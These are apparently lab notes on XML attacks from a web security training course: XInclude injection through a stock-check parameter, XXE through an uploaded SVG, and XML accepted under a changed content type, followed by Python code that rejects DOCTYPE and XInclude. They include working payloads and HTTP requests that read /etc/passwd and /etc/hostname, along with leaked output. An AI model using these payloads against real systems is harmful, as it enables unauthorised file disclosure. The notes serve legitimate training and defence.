XInclude Attacks

When client-submitted data is placed into a back-end SOAP request, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element.

However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

Lab: Exploiting XInclude to Retrieve Files

The original request:

POST /product/stock HTTP/2
Host: 0ac40010040c90418252100b00ae0075.web-security-academy.net
Cookie: session=Md8A8x5RjU8P4I0XuQ4O9BCWf2D9IS05
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Origin: https://0ac40010040c90418252100b00ae0075.web-security-academy.net
Referer: https://0ac40010040c90418252100b00ae0075.web-security-academy.net/product?productId=1
 
productId=1&storeId=1

Change the request body to this (the XInclude payload replaces the productId value):

POST /product/stock HTTP/2
Host: 0ac40010040c90418252100b00ae0075.web-security-academy.net
Cookie: session=Md8A8x5RjU8P4I0XuQ4O9BCWf2D9IS05
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Origin: https://0ac40010040c90418252100b00ae0075.web-security-academy.net
Referer: https://0ac40010040c90418252100b00ae0075.web-security-academy.net/product?productId=1
 
productId=
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=1

The response (an error message that echoes the rejected product ID) contains the content of /etc/passwd, as expected:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2341
 
"Invalid product ID: 
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

XXE Attacks via File Upload

Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents.

Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

Lab: Exploiting XXE via Image File Upload

Use the following payload from "An SVG 'image' that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself" (github.com):

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text></svg> 

The content of /etc/hostname is rendered as text inside the resulting image.

XXE Attacks via Modified Content Type

Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

For example, if a normal request contains the following:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
 
foo=bar

Then you might be able to submit the following request, with the same result:

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
 
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
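Server-side mitigations for the three techniques above (XInclude via a SOAP parameter, XXE via an uploaded SVG, XML accepted under a changed content type), as an added Python example that is not part of the original notes or the lab code. The parameter name, the sample payloads (copied from the text) and the policy "no DOCTYPE, no XInclude" are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

# Constructed samples: the two payloads shown in the notes and a benign SVG.
XINCLUDE_PAYLOAD = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)
SVG_XXE_PAYLOAD = (
    '<?xml version="1.0" standalone="yes"?>'
    '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
    '<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>'
)
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><text>hi</text></svg>'


def is_valid_product_id(raw: str) -> bool:
    """Hypothetical check for the lab's productId parameter: the back-end
    SOAP request only needs an integer, so anything else is rejected before
    it can be embedded in XML. That removes the XInclude injection point."""
    return raw.isascii() and raw.isdecimal()


def xml_text(value: str) -> str:
    """For fields that must accept free text: escape it as XML character
    data so markup in the value cannot alter the document structure."""
    return escape(value, {'"': "&quot;"})


def xml_rejection_reason(data: str) -> str:
    """Return "" if untrusted XML (an uploaded SVG, or a text/xml body) is
    acceptable, else why it is refused: any DOCTYPE (hence no entities at
    all) or any element in the XInclude namespace."""
    if "<!DOCTYPE" in data.upper():
        return "DOCTYPE not allowed"
    try:
        root = ET.fromstring(data)  # ElementTree does not expand XInclude
    except ET.ParseError as exc:
        return f"malformed XML: {exc}"
    for el in root.iter():
        if isinstance(el.tag, str) and el.tag.startswith("{" + XINCLUDE_NS):
            return "XInclude not allowed"
    return ""


def safe_parse(data: str) -> ET.Element:
    """Parse untrusted XML, raising ValueError on the constructs above."""
    reason = xml_rejection_reason(data)
    if reason:
        raise ValueError(reason)
    return ET.fromstring(data)
```

The DOCTYPE check runs on the raw text before any parser sees it, so entity declarations are refused regardless of the parser's own entity-resolution settings.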

Resources